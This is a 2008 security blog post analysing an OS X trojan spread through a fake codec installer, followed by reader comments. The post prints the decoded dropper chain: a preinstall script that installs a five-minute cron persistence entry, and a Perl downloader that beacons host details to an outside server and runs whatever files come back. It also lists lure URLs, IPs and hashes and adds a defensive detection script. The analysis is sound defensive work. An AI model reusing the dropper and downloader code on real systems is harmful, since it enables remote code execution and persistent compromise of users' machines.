Posted on Monday, November 24th, 2008

New OS X Malcode: Not Just a DNSChanger

by Jose Nazario

Apple’s OS X seems to have been taking a minor beating on the malcode front lately, as noted in the CA blog post New Trojans Strike OS X. I got a copy of it last night and had a look; I wanted to see what the OS X malcode community was up to. The answer is both nothing much (it’s like we stepped back to 1999) and some new stuff (approaches not yet seen in the OS X world, but old hat on Windows).

I became aware of the malcode through this URL shared in a ShadowServer link report:

http://online-channels.net/[REMOVED]/spam.txt

which yields the message “LOL look what the kid does to himself >> http://online-channels.net/[REMOVED]/random/1696/0/ :P :| !”, a lure that gets spammed out over some messaging layer. The hostname and IP are located in the Netherlands (abuse contact has been made; we’ll see about takedown). The server is User-Agent aware: it delivers a Mac executable to visitors on OS X and a Windows EXE to everyone else.

online-channels.net A INET 89.248.172.213
AS      | IP               | AS Name
29073   | 89.248.172.213   | ECATEL-AS AS29073, Ecatel Network

If you visit the website you see something like this, which leads to an “install this codec” prompt.

[Image: Jahlav_A_download.png]

I’m sure you can see why I was suspicious: running this on an OS X system produces a fake Windows XP dialogue box. So I downloaded it and had a look. It’s an OS X DMG file named “cold-live7000.dmg”.

MD5(eaac894f299d15e75f48d99e4d9b254f)  cold-live7000.dmg

The OS X version of this file has very poor AV detection according to VirusTotal. The Windows EXE (MD5 = 042d747ac1494035fa4e26845aebfddc) has 7/32 detected in VirusTotal, using names like “TR/DNSChanger.hkx”, “Win32:FaDrop”, “TrojanDropper:Win32/Alureon.gen!B”, “a variant of Win32/Kryptik.BT”, and “Mal/BadNSIS”. It contacts a different host:

AS      | IP               | AS Name
29073   | 94.102.60.56     | ECATEL-AS AS29073, Ecatel Network

Right next door to the OS X server (see below).

When you mount it under OS X you get a volume named “install.pkg”. For those of you not used to OS X, install.pkg is a typical name for an installer (.pkg is common in OS X). Nothing too up-and-up yet! Let’s start digging in:

o:/Volumes/install.pkg/install.pkg/Contents jose$ ls -lrt
total 96
drwxr-xr-x   8 jose  jose    272 Nov 15 12:35 Resources
-rw-r--r--   1 jose  jose      9 Nov 15 12:35 PkgInfo
-rw-r--r--   1 jose  jose   3277 Nov 15 12:35 Archive.pax.gz
-rw-r--r--   1 jose  jose  35617 Nov 15 12:35 Archive.bom
-rw-r--r--   1 jose  jose   1329 Nov 15 12:35 Info.plist

So far this looks … well, interesting. Let’s first dig into the Resources subdirectory, that usually has the very intriguing bits:

o:/Volumes/install.pkg/install.pkg/Contents/Resources jose$ ls -lrt
total 48
-rwxr-xr-x   1 jose  jose  8027 Oct 28 10:43 License
-rwxr-xr-x   1 jose  jose  2189 Nov 15 12:35 preupgrade
-rwxr-xr-x   1 jose  jose  2189 Nov 15 12:35 preinstall
-rw-r--r--   1 jose  jose    17 Nov 15 12:35 package_version
drwxr-xr-x   3 jose  jose   102 Nov 15 12:35 en.lproj
-rw-r--r--   1 jose  jose   545 Nov 15 12:35 BundleVersions.plist

The files “preupgrade” and “preinstall” do not differ; both are shell scripts:

o:/Volumes/install.pkg/install.pkg/Contents/Resources jose$ less preinstall
#!/bin/sh
if [ $# != 1 ]; then type=0; else type=1; fi && tail -35 $0 | uudecode -o /dev/stdout | sed 's/applemac/AdobeFlash/' | sed 's/bsd/7000/' | sed 's/gnu/'$type'/' >`uname -p` && sh `uname -p` && rm `uname -p` && exit
begin 777 withlove
M159)3#TB87!P;&5M86,B"G!A=&@](B],:6)R87)Y+TEN=&5R;F5T(%!L=6&ES=#U@8W)O;G1A8B`M;'QG

(Truncated) If we UUdecode that block (withlove) we get another script:

o:/Volumes/install.pkg/install.pkg/Contents/Resources jose$ uudecode -o /dev/stdout /tmp/withlove.uue
EVIL="applemac"
path="/Library/Internet Plug-Ins"
exist=`crontab -l|grep $EVIL`
if [ "$exist" == "" ]; then
     echo "*/5 * * * * \"$path/$EVIL\" 1>/dev/null 2>&1" > cron.inst
     crontab cron.inst
     rm cron.inst
fi
#
tail -21 $0 | uudecode -o /dev/stdout | sed 's/7777/bsd/' | sed 's/typeofrun/gnu/' | perl && exit
begin 666 jah
M(R$O=7-R+V)7)L"G5S92!)3SHZ4V]C:V5T.PIM>2`D:7`](CDT+C$P
M,BXV,"XQ,#8B+"1A;G-W97(](B(["FUY("1R=6YT>7!E/71Y<&5O9G);CL*
M"G-U8B!T<@/2!S:&EF=#L*"21S=')I;F<@
M/7X@<

(Truncated again) The first part of that installs a crontab entry (a scheduled job, running as the installing user) that executes the binary it is about to drop every five minutes to look for new malcode. The UUencoded archive "jah" is a Perl script:

o:/Volumes/install.pkg/install.pkg/Contents/Resources jose$ cat /tmp/jah.uue | uudecode -o /dev/stdout | sed 's/7777/7000/' | sed 's/typeofrun//'
#!/usr/bin/perl
use IO::Socket;
my $ip="94.102.60.106",$answer="";
my $runtype=;   # "typeofrun" is normally replaced with 0 or 1 by the dropper's sed; left empty by the decode command above
#
sub trim($)
{
         my $string = shift;
         $string =~ s/\r//;
         $string =~ s/\n//;
         return $string;
}
#
# Port and request line were garbled in the extracted post; reconstructed here as a plain HTTP/1.0 GET.
my $socket=IO::Socket::INET->new(PeerAddr=>"$ip",PeerPort=>"80",Proto=>"tcp") or return;
print $socket "GET /tor.pl HTTP/1.0\r\nUser-Agent: ".trim(`uname -p`).";$runtype;".trim(`hostname`).";\r\n\r\n";
#
while(<$socket>){ $answer.=$_;}
close($socket);
#
# Body follows the blank line; the "Time:" header lists the byte length of each file concatenated in the body.
my $data=substr($answer,index($answer,"\r\n\r\n")+4);
if($answer=~/Time: (.*)\r\n/)
{
     my $cpos=0,@pos=split(/ /,$1);foreach(@pos)
     {
         my $file="/tmp/".$_;
         #
         open(FILE,">".$file);
         print FILE substr($data,$cpos,$_);
         close(FILE);
         #
         chmod 0755, $file;
         system($file);
         #
         $cpos+=$_;
     }
}

With this your box is downloading whatever malcode the server hands out; the operators know what you’re running (the beacon reports the processor architecture and hostname), and further exploits are possible.

Earlier today the malcode phoned home to this HTTP server in AS29073 in the Netherlands:

AS      | IP               | AS Name
29073   | 94.12.60.106     | ECATEL-AS AS29073, Ecatel Network

Now that same server has moved to the UK:

AS      | IP               | AS Name
4589    | 94.12.60.106     | EASYNET Easynet Group Plc

It's no longer responding for me; it's possible that Easynet took care of it.
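Two checks an administrator could run, added here as an example and not part of the original post: one walks a crontab listing for the persistence entry the withlove script writes (a minute-based schedule running something out of /Library/Internet Plug-Ins), the other walks a web or proxy log in combined format for the beacon the Perl script sends (GET /tor.pl with a User-Agent of the form arch;runtype;hostname;). Both inputs are constructed samples; the client addresses, hostname and timestamps are made up for the demo, and a real run would feed `crontab -l` output and the real log.

```python
import re

# Host side: the withlove script installs a crontab line of the form
#   */5 * * * * "/Library/Internet Plug-Ins/AdobeFlash" 1>/dev/null 2>&1
PLUGIN_DIR = "/Library/Internet Plug-Ins"
CRON_ENTRY = re.compile(r"^(\S+)\s+\S+\s+\S+\s+\S+\s+\S+\s+(.+)$")

# Network side: the Perl script sends  GET /tor.pl  with a User-Agent built as
#   uname -p ; runtype ; hostname ;   e.g.  i386;0;jose-mac;
BEACON_UA = re.compile(r"^[^;\s]+;[01];[^;]+;$")
# Combined-format log line: client, timestamp, request, status, size, referer, user-agent.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$')


def suspicious_cron_entries(crontab_text):
    """Crontab lines that run something from the Internet Plug-Ins folder every minute or every N minutes."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_ENTRY.match(line)
        if not m:
            continue
        minute, command = m.groups()
        if PLUGIN_DIR in command and (minute == "*" or minute.startswith("*/")):
            hits.append(line)
    return hits


def beacon_hits(log_text):
    """(client, user-agent) pairs for requests that look like the jah check-in."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, method, path, _status, ua = m.groups()
        if method == "GET" and path.endswith("/tor.pl") and BEACON_UA.match(ua):
            hits.append((client, ua))
    return hits


# Constructed samples for the demo (not real data from the post).
SAMPLE_CRONTAB = """\
# nightly backup, benign
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * "/Library/Internet Plug-Ins/AdobeFlash" 1>/dev/null 2>&1
"""

SAMPLE_LOG = """\
10.0.0.5 - - [24/Nov/2008:13:05:01 -0500] "GET /tor.pl HTTP/1.0" 200 4096 "-" "i386;0;jose-mac;"
10.0.0.7 - - [24/Nov/2008:13:05:09 -0500] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [24/Nov/2008:13:06:00 -0500] "GET /tor.pl HTTP/1.1" 404 80 "-" "Mozilla/5.0 (Macintosh)"
"""

if __name__ == "__main__":
    for entry in suspicious_cron_entries(SAMPLE_CRONTAB):
        print("suspicious cron entry:", entry)
    for client, ua in beacon_hits(SAMPLE_LOG):
        print("beacon from %s with User-Agent %r" % (client, ua))
```

The cron check keys on the schedule plus the directory rather than on the file name, because the dropper's sed rewrites the name (applemac becomes AdobeFlash here) and a new build can pick another; the beacon check keys on the three-field User-Agent shape for the same reason, since the path alone would also match the third log line, which is an ordinary browser.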

UPDATE
I've been editing this post for the past hour or so adding new details as they come in. In addition to the single Windows sample I posted above, a handful more related samples have shown up in our database in the past week:

2008-11-24      KuLightCadecPock3373.exe
2008-11-24      http://xxxlexelink.com/[REMOVED]/pathexe.php?id=3373&na...
2008-11-23      http://cold-live.net/[REMOVED]/Xvid.Codec.Upda...
2008-11-22      http://mamasplanet.com/[REMOVED]/samplevideo.php
2008-11-21      6c9d833b1914341e9facea439ef7...
2008-11-20      keygen_Malware_Defender_1_0_1_3552.exe
2008-11-19      http://www.beautypornpost.com/[REMOVED]/movie...
2008-11-18      http://www.babespornmovies.com/[REMOVED]/fr...
2008-11-18      http://tasty-moms.com/[REMOVED]/video.php
2008-11-18      http://bitchysexymoms.com/[REMOVED]/mov.php

These samples connect to 94.102.60.56, but one of them connects to 78.157.142.108, located in UltraNet:

AS      | IP               | AS Name
35057   | 78.157.142.108   | ULTRANET-AS UltraNet Ltd.

That ISP is apparently in Latvia (.lv) … The Windows EXEs also POST to a script on the web server to announce their infections and get new binaries.

What’s even more interesting is the degree of investment this team has made in OS X malcode. They’ll be making new infections, it seems, for some time to come with that configurable loader.

Comment Post by: About recent OSX Trojan « Threat Researcher — November 25th, 2008 @ 4:06 am EST

[...] ArborNetworks: New OS X Malcode: Not Just a DNSChanger [...]

Comment Post by: Experiencia Personal » Más sobre el troyano en Mac OS X — November 25th, 2008 @ 1:22 pm EST

[...] the Macurium forum told me that a page says more about this subject. That page is Arbor Networks, a company dedicated to security in [...]

Comment Post by: Experiencia Personal — November 25th, 2008 @ 1:26 pm EST

Hi, I have been infected by this trojan or a similar one. I was able to clean it, but it drove me crazy.

Comment Post by: Interesting Information Security Bits for 11/25/2008 at Infosec Ramblings — November 25th, 2008 @ 6:51 pm EST

[...] Some nastiness that preys on Mac OS X. Not anything new, but worth noting. New OS X Malcode: Not Just a DNSChanger | Security to the Core | Arbor Networks Security [...]

Comment Post by: cheapRoc — November 25th, 2008 @ 11:12 pm EST

Congrats, this is the lamest excuse for malware on the Mac if I’ve ever seen one. It’s a shell script, which sets up crontab with some executable… all of which has to be run by the user: mounting a disk image, launching the installer and giving it sudo access.

I think I used to write more impressive DOS trojans in Pascal for Renegade BBS software back in 1992… please this is LAME!

Comment Post by: cw — December 1st, 2008 @ 1:40 pm EST

It doesn’t matter if this is “LAME” – people WILL fall for it. I work in a .edu environment and there are all kinds of people clicking on everything under the sun. It’s a hard problem to solve and it’s not easily solved with technology. In the meanwhile, messages like this from Jose who has time to perform this analysis are useful to us and others that lack the time & resources to do as much analysis as we’d like to.

Comment Post by: Nicholas Ptacek — December 1st, 2008 @ 2:33 pm EST

Greetings,
I was wondering if it would be possible for you to send us samples of the new DNSChanger variant for OS X for further analysis. Thank you for your time and assistance!

Comment Post by: matt — December 19th, 2008 @ 3:17 am EST

I fell for it – it’s definitely this macaccess installer Osxjahlava trojan and now I have no idea what to do
(btw – I got this through trying to download a Firefox plugin for Craigslist called Clpicview)

In trying to fix this situation, I keep coming across sites that describe it but no resource for fixing and removing it.

I also come across sites claiming to be able to fix it if you buy their software.

There are other sites that mention an online scan but upon careful reading it looks like it’s for uploading files to be scanned and screened? Which makes sense because I can’t imagine an online service that remotely fixes and eliminates this trojan for me.

Virus Barrier apparently does the trick but the trial version only allows you to detect and not fix it? And I don’t want to buy the program because I’m afraid to use my computer to buy anything, nor do I want to wait until tomorrow to fix it!

I don’t know who to trust and, worse, I don’t even know what kind of danger I’m in.

Can anyone help me?

Comment Post by: matt — December 19th, 2008 @ 4:47 am EST

Update: I downloaded the DNSChangerRemovalTool.

My DNS is back to normal but I still have this Adobe Flash in my cron search. After reading several articles tonight, it does seem like that cron is either wrongly accused of wrongdoing or indeed is part of the culprit. Anyone know for sure.. and if it is bad? How do I get rid of that?!
